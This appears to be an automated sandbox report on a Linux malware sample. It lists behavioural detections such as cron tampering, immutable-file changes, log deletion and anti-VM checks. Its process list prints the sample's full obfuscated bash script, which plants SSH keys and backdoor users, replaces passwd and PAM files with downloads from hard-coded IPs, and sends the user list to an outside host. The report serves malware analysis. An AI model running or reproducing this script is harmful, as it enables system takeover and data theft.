N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/sbin/usermod N/A

Adds a user to the system

Description Indicator Process Target
N/A N/A /usr/sbin/useradd N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Modifies special file permissions

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/591/maps /usr/sbin/needrestart N/A
File opened for reading /proc/846/maps /usr/sbin/needrestart N/A
File opened for reading /proc/775/maps /usr/sbin/needrestart N/A
File opened for reading /proc/814/maps /usr/sbin/needrestart N/A
File opened for reading /proc/834/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/584/maps /usr/sbin/needrestart N/A
File opened for reading /proc/717/maps /usr/sbin/needrestart N/A
File opened for reading /proc/729/maps /usr/sbin/needrestart N/A
File opened for reading /proc/762/maps /usr/sbin/needrestart N/A
File opened for reading /proc/770/maps /usr/sbin/needrestart N/A
File opened for reading /proc/883/maps /usr/sbin/needrestart N/A
File opened for reading /proc/356/maps /usr/sbin/needrestart N/A
File opened for reading /proc/417/maps /usr/sbin/needrestart N/A
File opened for reading /proc/714/maps /usr/sbin/needrestart N/A
File opened for reading /proc/747/maps /usr/sbin/needrestart N/A
File opened for reading /proc/754/maps /usr/sbin/needrestart N/A
File opened for reading /proc/392/maps /usr/sbin/needrestart N/A
File opened for reading /proc/437/maps /usr/sbin/needrestart N/A
File opened for reading /proc/590/maps /usr/sbin/needrestart N/A
File opened for reading /proc/740/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/3550/status /usr/bin/pkill N/A
File opened for reading /proc/4066/stat /usr/bin/pkill N/A
File opened for reading /proc/714/stat /usr/bin/pkill N/A
File opened for reading /proc/1057/status /usr/bin/pkill N/A
File opened for reading /proc/28/environ /usr/sbin/needrestart N/A
File opened for reading /proc/814/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/3737/status /usr/sbin/needrestart N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3474/ctty /usr/bin/pkill N/A
File opened for reading /proc/3569/ctty /usr/bin/pkill N/A
File opened for reading /proc/3671/status /usr/bin/pkill N/A
File opened for reading /proc/3548/stat /usr/sbin/needrestart N/A
File opened for reading /proc/3830/ctty /usr/bin/pkill N/A
File opened for reading /proc/3382/ctty /usr/bin/pkill N/A
File opened for reading /proc/846/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3453/status /usr/bin/pkill N/A
File opened for reading /proc/591/cgroup /usr/bin/pkill N/A
File opened for reading /proc/729/stat /usr/bin/pkill N/A
File opened for reading /proc/3788/stat /usr/bin/pkill N/A
File opened for reading /proc/42/environ /usr/sbin/needrestart N/A
File opened for reading /proc/8/stat /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/44/stat /usr/bin/pkill N/A
File opened for reading /proc/44/ctty /usr/bin/pkill N/A
File opened for reading /proc/3474/cgroup /usr/bin/pkill N/A
File opened for reading /proc/27/stat /usr/bin/pkill N/A
File opened for reading /proc/3860/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3282/environ /usr/sbin/needrestart N/A
File opened for reading /proc/50/status /usr/bin/pkill N/A
File opened for reading /proc/834/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2582/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3737/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3364/status /usr/bin/pkill N/A
File opened for reading /proc/775/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/19/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3883/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1048/root/usr/lib/python3.12/heapq.py /usr/sbin/needrestart N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/192/status /usr/bin/pkill N/A
File opened for reading /proc/34/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3559/cgroup /usr/bin/pkill N/A
File opened for reading /proc/770/status /usr/bin/pkill N/A
File opened for reading /proc/770/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2582/ctty /usr/bin/pkill N/A
File opened for reading /proc/3364/stat /usr/bin/pkill N/A
File opened for reading /proc/3553/stat /usr/bin/pkill N/A
File opened for reading /proc/2582/status /usr/bin/pkill N/A
File opened for reading /proc/4004/ctty /usr/bin/pkill N/A
File opened for reading /proc/27/stat /usr/bin/pkill N/A
File opened for reading /proc/23/stat /usr/sbin/needrestart N/A
File opened for reading /proc/3732/maps /usr/sbin/needrestart N/A
File opened for reading /proc/15/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3821/status /usr/bin/pkill N/A
File opened for reading /proc/3554/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3821/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3549/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/cmdline /usr/bin/pkill N/A
File opened for reading /proc/56/status /usr/sbin/needrestart N/A
File opened for reading /proc/1405/environ /usr/sbin/needrestart N/A
File opened for reading /proc/2582/status /usr/bin/pkill N/A
File opened for reading /proc/1061/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3569/stat /usr/sbin/needrestart N/A
File opened for reading /proc/6/cgroup /usr/bin/pkill N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/apt-get N/A
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A

Processes

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c exec '/tmp/xrx/init0' "$@" /tmp/xrx/init0]

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' "i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! 
g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! 
-';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! 
X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval 
"$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tB
z$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$u
Hz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz
$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/xrx/init0]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

